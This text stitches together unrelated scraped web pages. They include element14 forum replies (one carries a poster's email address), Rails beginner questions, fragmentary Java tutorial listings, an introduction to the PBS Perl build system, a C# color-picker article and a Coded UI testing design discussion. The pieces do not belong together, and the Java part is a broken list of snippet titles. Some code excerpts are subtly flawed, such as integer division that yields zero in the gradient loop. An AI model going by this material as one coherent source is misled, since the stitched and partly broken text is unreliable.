I noticed you are giving this one away. I sent you a message on the comments thread for the video on element14's site last night, but I don't know if you received it. I've been disabled for several years, but before that I had a union job in health care as an admin, so I have a pension. I know you are really smart and all, but this is my dream idea, and your version of it is as close to my original idea as I'm ever going to see.
If there is any way I could get you to create one for me, I would be grateful forever. I will pay for it; I have a pension and this is extremely important to me. I can prove this is my idea: every neighbor and friend of mine knows about it, and I have the emails I sent Apple and Woz. I never thought I would gain anything from it, but I did think it was a genius idea, and you having come up with the same idea proves that indeed it was a great one. Having working autonomous luggage would be a miracle and a dream come true for me. I am willing to pay for it; please just consider my request.

Of course, in the back of my mind I thought it would have been wonderful if Woz or Apple had written back and decided to run with this idea, creating the iLuggage (or the Griffin, as I had named it after my cat), and made a really polished, mass-produced luggage that was as recognizable as the iPhone. But I'm still very stoked that you have created a working version of my idea and come up with the idea yourself.

A few differences between ours: my idea (and I am a layperson who has no clue how to do more than use a screwdriver) was to have 4 wheels on the bottom which would work like a remote-control car or a Roomba/Scooba, except faster. The chair being built into the luggage isn't a necessity, but I thought it was a great thing to have for something that would basically allow the luggage's owner to need neither a seat nor an outlet. And of course built-in outlets and USB ports for charging devices from the batteries on board. Also, better battery tech and power. I realize you've created a luggage that is a proof of concept, but I thought that if a company were to sell a product for, say, $250, they would want to include all of these features. I thought that Bluetooth would be how the device followed a person around, so that one could download an app to their phone and the luggage would follow them that way. Once again, I have no idea how to put anything from idea to reality.
But I did come up with this idea, and it would be the most exciting thing that's happened to me in years to have a working model and show people that something I thought of actually works in practice. Another potential idea would be to create one using an integrated iPad dock, which would allow the battery and the camera of the iPad to be used in the operation of the luggage and pulled out when one reaches the TSA checkpoint. It seems to me that if the battery were part of the iPad and popped out when the iPad was removed, one would have luggage that passed through TSA without an issue, especially if there were an app that used the camera function to follow some special marker one would wear on their back pocket.

I know you don't know me and have no reason to help me. I'm willing to pay whatever you want for a working iLuggage to have, even if I'm not allowed to use it for my trips. I travel bimonthly on an airplane for medical treatment related to my back and neck injuries. stevemcmahon40@gmail.com is my email, and I'm very excited to see this and very, very hopeful that you might consider making one for me. I don't have much money, but I will come up with whatever you charge for it, because really, to see one of my ideas turned into a real product proves to me that I have valid ideas, even if I don't have the knowledge required to make them into reality. Regardless of what you decide, Mr. Heck, I do thank you for making this luggage, and I'm very, very happy to see that even though it's not exactly what I thought of, it's pretty close.

Best Regards, Steven McMahon

47. Re: Show Off Your Build (WeeBo, Apr 1, 2012 6:25 PM, in response to Christy-Admin)

This is a quick project I built in about 4 days, from the idea (concept) coming to mind to a working product... well, "product" might be far-fetched. I purchased an older (1985, from the service check tag) Bell payphone for $20 at an auction.
I had it sitting around for a while before I looked at it. I wanted to do something with it; I just didn't know what. Since I don't have a landline in my apartment, as I use my cell as a primary line, the ideas narrowed down. I thought, HEY!! Wireless payphone. I decided to use an older-style cellphone to connect to the payphone, as it would be a lot easier. The pay/cellphone is on a cheap secondary account and is now used as the door buzzer to my apartment. So when someone calls from downstairs, the payphone rings and I buzz them in. If someone comes over and they need to use the phone, I point them in the right direction. The video is a bit weird since the PIP was recorded at a different time, since you really couldn't see the LCD in full view. (Didn't proofread; if typos are found, please ignore.)

48. Re: Show Off Your Build (watermoccasin, Apr 4, 2012 3:15 PM, in response to Christy-Admin)

49. Re: Show Off Your Build (ocaron, May 6, 2012 5:46 AM, in response to Christy-Admin)

A small challenge for you: how can I add a laptop lid switch and associated power options to a tower PC (it must be a toggle switch), so that I can set it to turn off the monitor or go into standby when the switch isn't held, i.e. a dead man's switch?

50. Re: Show Off Your Build (WeeBo, May 6, 2012 7:35 AM, in response to ocaron)

Actually this would be pretty simple to do, in principle. All you would really need is a momentary switch, or even a microswitch wired NC (normally closed). I would jack that into the Power/Reset pin on the computer mobo (follow the pinout; it should be labeled). In Windows, choose an action you would like Windows to perform when the power button is "pressed" (since it's NC, it will "press" on open). Then stick it on your chair, so when you sit down it powers on, and when you stand up it goes off. Not a bad idea. The wiring might be backwards, but the idea is there.

51.
Re: Show Off Your Build (ocaron, May 6, 2012 3:39 PM, in response to WeeBo)

Thanks, but if I wire it to the power switch, then when I stand up it will turn the computer off after 5 seconds regardless of the settings, unless you know how to turn that off, but I think it's a hardwired function.

52. Re: Show Off Your Build (shnak, May 11, 2012 3:48 PM, in response to Christy-Admin)

53. Re: Show Off Your Build (dakota.gamer.dreamer, Jul 31, 2012 12:16 AM, in response to Christy-Admin)

Dear Ben Heck, I have had the idea of building a 360 laptop, but I do not have the tools nor the money to buy them. I am not very electronically inclined, but I did build a computer tower when I was twelve with the help of my great-uncles. I was wondering if you could build me a 360 laptop with HDMI. How much would it cost to make? I would appreciate your opinion. Thank you. Dakota

54. Re: Show Off Your Build (nonme85851, Aug 12, 2012 10:55 PM, in response to Christy-Admin)

Hi, Ben! I know you are great at making projects for laziness, and I have a challenge for you! Have you ever noticed that the boom of your headset gets in the way? You should create some sort of project to solve this issue: when it detects something in front of the mic, it automatically raises it so you can take a bite of your food!

55. Re: Show Off Your Build (Jon_McPhalen, Aug 25, 2012 10:35 PM, in response to Christy-Admin)

I wonder how the wheelchair update is coming along. It seemed odd to me that the motors were so noisy, like the PWM frequency was out of whack. I design circuits and code (for the Parallax Propeller chip) for a friend who makes pan/tilt controllers. One of the things I do on start-up is read the raw values from the X and Y sticks and call these the "idle" position. The deadband then surrounds that. What this can lead to, especially with low-cost joysticks, is an offset idle value (i.e., not in the center of the pot range).
What I do then is re-scale the new values on either side of the pot with a simple method (for those that have never seen Spin, the operators for less-than-or-equal and greater-than-or-equal are different from what you're used to):

    pub scale(raw, range, minout, maxout)
      '' Scales raw (0 to range) value to new range: minout to maxout
      if (raw =< 0)
        return minout
      elseif (raw => range)
        return maxout
      else
        return ((raw * (maxout - minout)) / range) + minout

This is just a simple mx+b thing, but it helps take care of all the oddities of inexpensive joysticks and the use of a deadband.

That was a nice thing to do for that couple. If they have a boy, will they name him Ben?

56. Re: Show Off Your Build (FidelGVelasquez, Sep 13, 2012 12:11 PM, in response to Christy-Admin)

I don't know much about internet forum etiquette, so I'll just describe my challenge: I challenge Ben Heck to mount solar panels on a backpack, have them charge a rechargeable battery (or battery pack), and subsequently have the battery power a small, low-power-consumption Linux PC (such as the Raspberry Pi), with the option to switch to powering a USB hub (for charging other devices). The backpack would need to be relatively small (for easy mobility) and not too heavy (less than 15 pounds would probably be good). If possible, he could add a screen and keyboard (and speakers?) in one of the larger pockets. I am currently 14, and I'm going to be moving to a place with a lot of sunlight but not as much in the way of electrical outlets, and it would be nice if I could continue my random computing projects and such. If Ben ever reads this, just private-message me through element14. I'll be posting this as both a discussion and a reply to "Show Off Your Build."

57. Re: Show Off Your Build (benheck, Sep 25, 2012 4:10 PM, in response to nonme85851)

That's a cool idea, Kevin! There's actually an upcoming episode along those lines, but the headset one might be good for the future too.
Cheese dip on your mic for the last time!

Jon, yes, the issue was that we used the Arduino PWM, giving us a pulse in the audible range. Something like the Propeller frequency counters would be awesome. Don't worry, I haven't forgotten the Prop! (Or the Prop 2, should it ever arrive!)

58. Re: Show Off Your Build (JonnyEnglish, Oct 28, 2012 7:42 AM, in response to Christy-Admin)

Halloween costume: insanely geeky!! Mr Arcade Halloween Costume on YouTube!! I made it! The full description is in the video description on YouTube, including a quick video of how I made it!! Could you make it with a Raspberry Pi and make it better, cheaper and lighter? (Like a repeat episode of improving the portable Atari!!) Let me know... time is short until Halloween!! Happy Halloween! >>>>>>>>>

59. Re: Show Off Your Build (isthisthingon, Nov 17, 2012 7:23 PM, in response to Christy-Admin)

Hello, since I know nothing about internet manners, I'll get straight to the point. Would it be possible for you to do something along the lines of Yoshi's Boxx? Yoshi's Boxx was an ATX computer case with a GameCube, PS2, Xbox, and gaming PC in it. Could it be possible to do this with modern consoles? I know it would require quite a bit of cooling, but I think it might be possible. Sincerely, TheYoungHag
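Jon_McPhalen's Spin `scale` routine above is just a clamped linear (mx+b) map. For readers who have never seen Spin, here is the same logic sketched in Python; the integer math matches the original, and the joystick numbers in the demo are made up for illustration.

```python
def scale(raw, rng, minout, maxout):
    """Scale raw (0..rng) to the range minout..maxout, clamping out-of-range input."""
    if raw <= 0:
        return minout
    if raw >= rng:
        return maxout
    # simple mx+b, done in integer math as in the Spin version
    return (raw * (maxout - minout)) // rng + minout

# A 10-bit joystick reading (0..1023) mapped onto -100..100:
print(scale(0, 1023, -100, 100))     # -100 (clamped low end)
print(scale(1023, 1023, -100, 100))  # 100 (clamped high end)
print(scale(512, 1023, -100, 100))   # 0 (near-center stick reads as idle)
```

The clamping at both ends is what absorbs the offset idle values Jon describes: a pot that never quite reaches its electrical extremes still maps cleanly onto the full output range.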
http://www.element14.com/community/message/48821
theshashiverma (user activity)

I am creating an admin template, and there is a customizer section in which I have created 3 radio buttons (named Red, Blue, Green). There is a left sidebar navigation menu, and I want to change the background color of the sidebar navigation menu by clicking on the radio buttons. If I click on a button, it changes the background color of the sidebar navigation menu by adding a class, but if I go to another page, the page gets reloaded and the class gets removed.

I have tried one thing: in my application_helper.rb I have added the following code

    def is_active(action)
      @color = "red"
      params[:action] == action_name ? @color : nil
    end

and in my layouts folder I have a partial file _sidebar.html.erb, where on the outer div I use this helper like below

    <div class="sidebar-nav <%= is_active('action_name') %>" id="collapse-sidebar" >

What I am doing here is checking the action name; if it matches, I add the class red, which is stored in the instance variable @color. If I could pass the value of the radio button to the application helper dynamically (if I click on red the value should be red, on green the value should be green), then I could change the class name dynamically in the application helper, and that in turn would change the color of the sidebar.

Please, if I am doing anything wrong, or this is not the right way to do it, or this kind of functionality can't be achieved in Ruby on Rails, let me know; that would be appreciated. On Stack Overflow: Thank you

I am getting this "Rails ExecJS::ProgramError in Pages#home" error in the browser when I go to the root path, which is pages#home. I am using Windows 10. Until I add Bootstrap it works fine, but after adding Bootstrap and jQuery I get this error. I followed this article to add Bootstrap to my project. And why am I getting this error? While using Ubuntu I did not face it, so why on Windows 10?
Thank you for the reply, sir. Yes, I am using 5.2, and you have shown me the new way to keep the secrets and IDs of the providers; I will try it like that. For now, what I did was keep the ID and secret in the devise.rb file, and that was also working fine. Now I am facing another issue: how to add multiple providers. Can you please check this out?

I have one more thing to ask: a few days ago I read an article saying that in the upcoming Rails 6 we are going to use some kind of webpack or Webpacker, and then we won't need CoffeeScript in our projects anymore, or at least it will no longer be compulsory, and plain JS will be fine. Is that right? Because in my project I have used CoffeeScript almost everywhere. Thank you so much.

@ChrisOliver Thank you, sir, for the reply. One more thing to ask: when using OmniAuth + Devise, is it necessary to keep the client ID and secret in the .env (environment variable) file? For that I have to install the dotenv gem and then run the project with the "dotenv rails server" command. Can I keep the ID and secret in an omniauth.rb file that I created myself in the initializers folder?

I want to add social authentication to my project, so users can also log in with Facebook, GitHub, and Google. I have already added simple authentication with the Devise gem, and now I want to add social authentication as well. I found many articles on the internet, and I mainly found two ways to do it:

- Devise + OmniAuth
- OmniAuth alone

So, can anyone suggest the best way to add social authentication? This is the article on OmniAuth, and this one on Devise + OmniAuth that I followed. Thank you.
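On the sidebar-color question above: the class disappears on reload because the choice only lives in the browser's DOM. A common fix is to persist the chosen color server-side (e.g. in the session, set by a small controller action from params[:color]) and have the helper read it back instead of hard-coding "red". This is a sketch, not code from the original app; the method name and session key are hypothetical, and the Rails plumbing is stripped away so the core logic can run standalone:

```ruby
# Whitelist the colors the customizer offers, so an arbitrary
# param value can never be injected as a CSS class name.
ALLOWED_COLORS = %w[red blue green].freeze

# In Rails this would read session[:sidebar_color], which a controller
# action sets from params[:color] when a radio button is clicked.
def sidebar_color(session)
  color = session[:sidebar_color]
  ALLOWED_COLORS.include?(color) ? color : ""
end

# The ERB in _sidebar.html.erb would then become something like:
#   <div class="sidebar-nav <%= sidebar_color(session) %>" id="collapse-sidebar">
puts sidebar_color({ sidebar_color: "green" })  # green
puts sidebar_color({}).inspect                  # "" (no choice stored yet)
```

Because the session survives page loads, the class is re-applied on every render; the whitelist check is what keeps a tampered parameter from reaching the markup.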
https://gorails.com/users/18729
Java package examples (related topics):

- Java Util Package, the utility package of Java: one of the most commonly used packages in Java programs.
- java.util.Date, time zone throwing IllegalArgumentException. Sample code: String timestamp1 = "Wed Mar 02 00:00:54 PST 2011"; Date d = new Date(...); the Date object is not getting created for the IST time zone.
- Java Associate (Java interview questions).
- Create a web page with JSP: how to create a first web page on the Tomcat server; JSP is simply Java working inside HTML pages.
- Java interview questions: an explanation with a simple real-time example.
- Hello World code example: public class HelloWorld { public static void main(...) { ... } }
- Java BigDecimal plus method example: demonstrates the working of the BigDecimal class; the method throws NumberFormatException if it finds an invalid value.
- Example of the contains() method of HashSet in Java: contains() checks whether the given element is available; it returns true if so, otherwise false.
- Data structures in Java: the data structures of the java.util package, such as Hashtable and Properties, and those added after the release of Collections in Java 2.
- Java word count: a word-count example that counts the words and lines present in a file.
- Java Locale.
http://www.roseindia.net/tutorialhelp/comment/81163
This document is a gentle introduction to PBS. It gives you some insight into why we designed it the way we did. PBS is a build utility in the same spirit as make. It is not compatible with make and works completely differently!

The history of PBS starts with the state of complete frustration we reached when trying to get gmake to do anything complicated. To fix that problem, we introduced cons at our job, and it worked fine, but I was not completely happy with cons, and neither were other people on the cons mailing list. During the Christmas break, I always try to start a new project. The month was December, my frustration with make was at its peak, Christmas was one week away: PBS was born! After a week's work I had a small working build system. At that time I was in contact with Michel Pfeiffer, who was working on the now defunct make.pl. Our goal was to write an advanced build system in under 10 KB of code (I can only smile when I see PBS is closer to 400 than 10 KB).

From the make.pl home page: "Arcane make and its various derivatives (cook, GNU make, jam, makepp, ...) use a weird language mix of a variable and rule syntax plus, for actually doing something, embedded shell (along with sed, awk ...). The derivatives improve this language, but the improvements are not accessible with automake, and still don't make a really usable language. Having a powerful scripting language instead of a crippled one makes a huge difference for a build system maintainer."

To the arcane make I would add the ugly, unreadable XML-based build systems. I also wanted to try new ideas that haven't been used in other build systems.

META is a very overloaded word that computer engineers use when they want to make something sound more intelligent than it really is. PBS is not a build system; it's a library that makes it possible to write a build tool, and eventually an instantiation of it, i.e. a build system. Work must be invested in a build system, or more rightly in "the" build system you are using.
This is true whatever tool you are using. We have such a tool, pbs (note the lower-case name). PBS gives you the possibility to do things; it's up to you to do them. If you are looking for some magical build system, there are a few out there that might do that for you. If you only write build systems in your free time, or really, really only when you need to, then PBS is not for you.

PBS is a three-pass system: it builds a dependency graph, checks the dependency graph to find out what is to be built, then builds whatever nodes need it. This is very different from make, which builds on the run. Both systems have advantages and disadvantages.

PBS lets you define rules in scripts written in Perl. Using filters, you could write them in whatever language you want. Once the rules are defined, PBS generates the dependency graph by applying the rules recursively to the top target and its dependencies. Having the whole dependency graph has advantages; it also has disadvantages. To overcome the first disadvantage, PBS uses a caching scheme we call warp.

PBS is a superset of Perl, or an add-in to Perl (choose whichever you prefer). It introduces only a very few extra functions. Those functions are nothing more than plain Perl subs. The build scripts being Perl, they are interpreted by perl within the framework of PBS.

I, Nadim Khemir, wrote PBS, but the credit is not only mine. Anders Lindgren has been involved from the very beginning with the architecture, and he is also the one that can use PBS best. Ola Maartensson also deserves large credit for forcing us not to fix something just for our needs but to think about other users (mainly him :-). He set his mark on how things should look and how verbose a build system should be. Ola and I maintained the build system at our work. It was based on make, and that's why we tried to make PBS look a bit the same.

Here is a simple rule:

    AddRule 's_objects'                                          # name
        => [ '*/*.o' => '*.s' ]                                  # depender
        => "%AS %ASFLAGS ... -o %FILE_TO_BUILD %DEPENDENCY_LIST" ;  # builder

The rule could be defined in a rule library, and that library could be included instead of defining the rule inline. This is exactly what we do in a file we call (wrongly, as the rule above is for assembler files) C.pm. PBS has support for finding libraries and locally overriding libraries. The above (and much more) is replaced in our Pbsfiles by this single line:

    PbsUse('Rules/C') ;

We try to mimic Perl's use, and we give our libraries the extension .pm. Pbsfiles should have the extension .pl. PBS automatically pushes your script into a package. This is done to separate rules and configurations when doing a hierarchical build. All Pbsfiles run in strict mode. Pbsfiles are Perl scripts, so anything you can do in a Perl script you can do in a Pbsfile, including using modules from CPAN. You can add rules, but you can also remove rules from the rules defined in the libraries you include.

PBS doesn't do much, and does nothing by default. I don't like to guess what is going on, so I find it empowering to have to tell the system what to do. Since PBS is a meta build system, you can write your own interface that makes it look easy, or use the less easy but straightforward native interface. PBS has no built-in rules, period.

Rules have 6 components, 2 of which are mandatory. A rule always has a name (mandatory); this is to simplify debugging (of _your_ build system). A rule also belongs to a rule namespace. More often than not, PBS handles this transparently and you don't even know it is there. A rule can carry a node type, i.e. when a node matches a rule, the rule's types are passed to the node. To know whether a rule matches a node, a (mandatory) depender is declared. Most often the depender is a list containing a regex and a dependency definition. A depender can also be a Perl sub, so it can get very powerful and complicated; one such depender is the example C depender that comes with PBS. PBS also needs to know how to build nodes.
This is either done with a list of shell commands or, again, by using Perl subs. Finally (since version 0.28_3), PBS accepts what we call "node subs". Node subs are run when a node is added to the graph. These subs can do a wide range of operations that are described in the reference manual; you can also define your own "node subs". All these elements are described in detail in the reference manual.

A meta rule is a rule made of multiple rules, with some glue to say which of the base rules matches. An example: from which source code do you build an object file when you have a C file and an assembler file? You have three rules: one to build from a C file, one to build from an assembler file, and one to arbitrate between the two.

Dependers are Perl subs; you can also define a sub that returns a depender sub. These subs are run in order, and the sum of the dependencies becomes the dependencies of the node under work. Note that this is different from make. A builder is also a Perl sub. To simplify things, for the user anyhow, AddRule also accepts a list of shell commands. PBS uses the builder from the last matching rule. It will also tell you (if you ask) whether nodes had other builders.

PBS lets you define and query configuration variables. These are Perl variables, so they can contain live objects like a mailer or anything you fancy. PBS will check whether you try to override a configuration variable, and it will show you what your variables contain if you ask.

PBS never changes directory, and you should never change directory in a depender or a builder. Everything is based in '.', the current directory. The check step locates the files based in '.' and sets their full-path build names. If you don't give a specific build directory to PBS, it will build into "out_" + your user name, so you never clutter your source directory unless you really want to. PBS can locate your source files in multiple directories; these are also sometimes named "repositories" in other build systems.
Your repositories can also contain binary files.

PBS supports hierarchical builds. No extra process is started for a sub-build (called a sub-pbs); this is a necessity, as we must have the full dependency graph. Unlike cons, top-level build files and lower-level build files are equivalent. This lets you use PBS for building projects, or their sub-components, with the same set of Pbsfiles.

There are two ways to start a sub-pbs: by directly matching a rule that starts a sub-pbs, or by defining a trigger. A trigger will start a sub-pbs when a node "triggers" a rule (this is much easier to comprehend with an example). The nice thing is that triggers can be defined in the sub-Pbsfile and imported from there. This allows for a better separation of the rules making up your build system. The user's manual has such an example.

Pbsfiles can be commented with POD, and PBS can extract the documentation and even search it for you. PBS has debugging hooks that let you run specific Perl code on certain events. The support works in the Perl debugger too. (Hmm, what about the latest Perl version?)

Khemir Nadim ibn Hamouda <nadim@khemir.net> and Anders Lindgren (ALI). Thanks to Ola Maartensson for his input. Parts of the development were funded by C-Technologies AB, Ideon Research Center, Lund, Sweden.

Artistic License 2.0
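The three-pass scheme described above (depend, check, build) can be sketched in a few lines. This is an illustration of the idea only, not PBS code, and it is in Python rather than Perl so the toy run at the bottom is easy to follow; the rule shape (a match predicate plus a dependency generator) loosely mirrors a PBS depender.

```python
def depend(target, rules, graph):
    """Pass 1: apply depender rules recursively to grow the full graph."""
    if target in graph:
        return
    deps = []
    for matches, make_deps in rules:
        if matches(target):
            deps += make_deps(target)
    graph[target] = deps
    for d in deps:
        depend(d, rules, graph)

def check(target, graph, mtime, stale):
    """Pass 2: with the whole graph known, mark out-of-date nodes bottom-up."""
    for d in graph[target]:
        check(d, graph, mtime, stale)
    if any(d in stale or mtime(d) > mtime(target) for d in graph[target]):
        stale.add(target)

def build(target, graph, stale, builders, built):
    """Pass 3: run builders for the marked nodes only, dependencies first."""
    for d in graph[target]:
        build(d, graph, stale, builders, built)
    if target in stale and target not in built:
        builders[target]()
        built.append(target)

# Toy run: one rule says every .o file depends on the matching .c file.
rules = [(lambda t: t.endswith(".o"), lambda t: [t[:-2] + ".c"])]
graph = {}
depend("main.o", rules, graph)           # {'main.o': ['main.c'], 'main.c': []}

mtimes = {"main.c": 2, "main.o": 1}      # the source is newer than the object
stale = set()
check("main.o", graph, lambda n: mtimes.get(n, 0), stale)

built = []
build("main.o", graph, stale, {"main.o": lambda: None}, built)
print(built)  # ['main.o']
```

The point of splitting the passes is the one the text makes: by the time anything is built, the complete graph exists, so the tool can answer questions about the whole build (and cache the graph, as warp does) instead of discovering dependencies on the run as make does.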
http://search.cpan.org/dist/PerlBuildSystem/doc/PBS_short_introduction.pod
Introduction

One big handicap of the framework is its low number of visual controls. Luckily the most useful ones are present, but we often run into problems with the less common controls. Some days ago I developed a program that translates colors into HTML code. In the beginning I simply used three trackbars to change the red, green and blue. Later I needed a quicker and more intuitive solution, so I built this ColorPicker. This control allows a color to be selected faster than the previous approach. Because I haven't seen a similar control in this section, I decided to post it. In the last update I added a consistent number of controls. All the controls are listed below:

- ColorViewers (namespace Fuliggine.ColorPickers)
- Special Pointers (namespace Fuliggine.ColorPickers)

The ColorPickers Controls

Most of these controls don't need any explanation, or so I think. For CodeBar and FullCodeBar I divided the width into six sections to allow all the possible combinations of R, G, B. After that I found the color step done per pixel and drew the control line by line:

    protected override void OnPaint(PaintEventArgs e)
    {
        int R = 255;
        int G = 0;
        int B = 0;

        // horizontal: the color step per pixel
        int colorstep = 255 / (this.Width / 6);
        int i = 0;

        for (B = 0; B < 256; B += colorstep, i++)   // red -> magenta
            e.Graphics.DrawLine(new Pen(new SolidBrush(Color.FromArgb(R, G, B)), 1), i, 0, i, this.Height);
        B = 255;
        for (R = 255; R > 0; R -= colorstep, i++)   // magenta -> blue
            e.Graphics.DrawLine(new Pen(new SolidBrush(Color.FromArgb(R, G, B)), 1), i, 0, i, this.Height);
        R = 0;
        for (G = 0; G < 256; G += colorstep, i++)   // blue -> cyan
            e.Graphics.DrawLine(new Pen(new SolidBrush(Color.FromArgb(R, G, B)), 1), i, 0, i, this.Height);
        G = 255;
        for (B = 255; B > 0; B -= colorstep, i++)   // cyan -> green
            e.Graphics.DrawLine(new Pen(new SolidBrush(Color.FromArgb(R, G, B)), 1), i, 0, i, this.Height);
        B = 0;
        for (R = 0; R < 256; R += colorstep, i++)   // green -> yellow
            e.Graphics.DrawLine(new Pen(new SolidBrush(Color.FromArgb(R, G, B)), 1), i, 0, i, this.Height);
        R = 255;
        for (G = 255; G > 0; G -= colorstep, i++)   // yellow -> red
            e.Graphics.DrawLine(new Pen(new SolidBrush(Color.FromArgb(R, G, B)), 1), i, 0, i, this.Height);
    }

A similar approach is also used in ColorGradient and SquareColorPicker, but there only the tones of one color are shown.
int ScaleY = 255 / this.Height;
for (int y = 0; y < this.Height; y++)
{
    int r = pColor.R - (y * ScaleY); if (r < 0) r = 0;
    int g = pColor.G - (y * ScaleY); if (g < 0) g = 0;
    int b = pColor.B - (y * ScaleY); if (b < 0) b = 0;
    e.Graphics.DrawLine(new Pen(Color.FromArgb(r, g, b), 1), 0, y, this.Width, y);
}

The MonoFrameColor and DoubleFrameColor are realized with simple panels. The Hole pointer is a simple control that keeps itself inside the apparent bounds while the mouse drags it. Based on its position over the controls, the selected color is decided.

The Color Picker Application

The demo is, I find, a nice application, simple but useful for anyone who often works with HTML. This application shows one way to use the StableColorPicker.

How to know the RGB color

I decided to draw a round rainbow. The main problem is that in an RGB system we have three variables, while the plane has only two. So I decided to take the X value as red, the Y value as green, and the distance from the center as blue. The circle is inscribed in a square of 255 pixels per side. The distance from the center is calculated with the Pythagorean theorem and rescaled to fit the range 0-255, so every point is associated with one value between 0 and 255 per channel.

How to paint the circle

To paint the circle I have two ways: the first is to paint all the points along the ray for each angle; the second is to paint every point of each concentric circle.
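Before looking at the painting itself, the colour mapping described above can be written as a small function. This is a sketch; the method name and exact centring are my own, not from the original control:

```csharp
// Sketch of the mapping: X -> red, Y -> green, distance from the centre -> blue.
// The circle is inscribed in a 255x255 square, so the Pythagorean distance is
// rescaled from [0, radius] to [0, 255].
private Color ColorAtPoint(int x, int y)
{
    const double side = 255.0;
    double cx = side / 2.0, cy = side / 2.0;
    double radius = side / 2.0;

    double distance = Math.Sqrt((x - cx) * (x - cx) + (y - cy) * (y - cy));
    int blue = (int)Math.Min(255.0, distance * 255.0 / radius);

    return Color.FromArgb(x, y, blue);
}
```

The Min guard handles the square's corners, which lie farther from the centre than the circle's radius.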
These two different ways can be selected by the user. This piece of code is shown here:

// set some useful variables
int offset = 1;
int width = this.ClientRectangle.Width - 2;
int height = this.ClientRectangle.Height - 2;
int rx = width / 2;
int x = 10;
int y = 10;
int cx = offset + rx;
double teta = 0;

// refresh the background
e.Graphics.FillRectangle(new SolidBrush(this.BackColor), this.ClientRectangle);

// the core of the painting
if (AnimationRadial == true)
{
    // ... paint all the points along the ray for each angle ...
}
else
{
    for (double ray = 0; ray < rx; ray = ray + 1)
        for (teta = 0; teta < 2 * Math.PI; teta = teta + 0.003)
        {
            // ... paint the point of this circle at angle teta ...
        }
}

How to select a color

To select a color I made a special class that can be moved by the user. Every ColorPicker has one of these, and the control returns the color under it.

Problems

A big problem is flickering while repainting. I resolved it by taking a screenshot of this control and putting it on a new control derived from a paint box. This isn't an elegant solution, but it works. I call this new control StableColorPicker.

Classes

In this release we have the first version of the control (ColorPicker), which works fine but isn't very stable, and then the second, stable version (StableColorPicker).

Credits

If you would like to see my other work, please visit my home page.
http://www.c-sharpcorner.com/UploadFile/zeppaman/FuliggineColorPickers05102006045402AM/FuliggineColorPickers.aspx
Discussion about design of a custom testing framework that leverages Coded UI Testing in Visual Studio 2010 - Thursday, May 13, 2010 4:16 PM

Hello All, I want to discuss and get feedback about my ideas for creating a custom testing framework for our applications that leverages the Coded UI Test in Visual Studio 2010. I need to evaluate my current design.

Definition: A UI testing platform is a system that provides interaction with the UI in an application under test. Coded UI Testing and QuickTest Pro are examples.

Definition: A custom testing framework is a layer (or several layers) of basic functionality that provides levels of indirection between the testing platform and the actual tests that will be executed. The tests call functionality from the custom testing framework, which manipulates the UI using the UI testing platform or provides custom functionality of some sort. These levels of indirection are meant to enhance the maintainability and robustness of Coded UI Tests.

In investigating Coded UI Testing I have found that recording individual tests often led to very similar steps and UIMaps in each test. I have already gone through and have implemented multiple UIMaps. There is still a problem recording actions on a per-test basis, though, since for every test I am generating identical functionality. An example of this would be the logical group of actions called "open a project", which is a composite of many sub-steps and is used in almost every test. It is therefore desirable to have a single method, recorded or built by hand, stored in some library of functions that can be invoked when required. I would call these methods that implement logical groups "test components".
Definition: A test component is a test method existing in some layer of the custom testing framework that uses one or more UIMaps to manipulate UI elements to accomplish some specific task such as clicking an individual button, or to accomplish a logical group of actions such as opening a project. Test components can be identified by their common patterns in many tests. There are two types of test component. An “atomic test component” might perform some number of actions against the UI, but will never reference other components. That is, an atomic test component only uses the UIMap to manipulate UI elements. The second type of test component is a composite test component that is built from atomic components and composite components. Each test component will require access to one or more UIMap(s) to function. Since each test component will be implemented as a “test method”, the exception handling mechanism that provides results for tests can still be used and will filter up through the hierarchy of components in the custom testing framework. Since a test component is either atomic or is a collection of test components, and any test component is handled in the same way whether it is atomic or a collection, this is somewhat analogous to the composite design pattern except not in the context of object construction. A good example of a composite component is the “open a project” test component. This method would take the name of the project to open as a parameter and use atomic and potentially other composite components to execute the logical group of operations that open a project. The UIMaps used by such components are a little bit of a concern. The UIMap used by the “open a project” method also exists in the library and as such is not duplicated in multiple tests. Thus at the beginning of most tests, the test author will have to insert a call to the “open a project” method. 
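As a sketch of the distinction above (all class, UIMap, and control names here are illustrative, not from the actual framework), an atomic and a composite test component might look like:

```csharp
public static class ProjectComponents
{
    // Atomic test component: touches the UI only through the shared UIMap.
    public static void ClickNewProjectButton(SharedUIMap map)
    {
        Mouse.Click(map.MainWindow.NewProjectButton);
    }

    // Composite test component: the logical group "open a project",
    // assembled from atomic actions; level-3 tests call only this method.
    public static void OpenProject(SharedUIMap map, string projectName)
    {
        Mouse.Click(map.MainWindow.OpenMenuItem);
        Keyboard.SendKeys(map.OpenDialog.ProjectNameEdit, projectName);
        Mouse.Click(map.OpenDialog.OkButton);
    }
}
```

Because both kinds are ordinary static methods, a Coded UI exception thrown inside either one propagates up to the calling test and is reported in the normal way.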
Unfortunately, as far as I can see at this point, this seems to break the test recording model, since the Coded UI Test Builder doesn't provide a way to indicate a call to a method in the library instead of recording a new UIMap and method. Ultimately the goal is to provide a comprehensive set of test components implementing logical groups of actions, such that a test creator can avoid duplicating functionality and quickly assemble a test by calling the appropriate components. The testers here have limited development experience, but are in the process of learning the basics. Hopefully in the long term, anyone from the most experienced developer to the programming-challenged will be able to create automated tests that are maintainable and robust. With this model in mind, the recording functionality in VS2010 will be used only for creating the library of logical groups of actions (test components) and for per-test functionality that has not been included in the library at the time of test creation. This is OK, but it is not ideal, and it would be nice to be able to extend the Coded UI Test Builder to add calls to the component library when required. A more serious problem lies in asserting or checkpointing values during test creation. While there may be some common assertions or checkpoints included in the library of components, for all tests there exist test-specific expected values. These test-specific expected values must be stored in each test or in some structure defined to hold them; perhaps a CSV file. Since the UIMaps for everything lie in the application-specific library of methods, using the assertion creator of VS2010 will not reference the library UIMaps and will thus try to create a per-test UIMap that may duplicate some of the library UIMap for that portion of the application under test. This may even be desirable in some cases, but it still creates a potential maintainability problem.
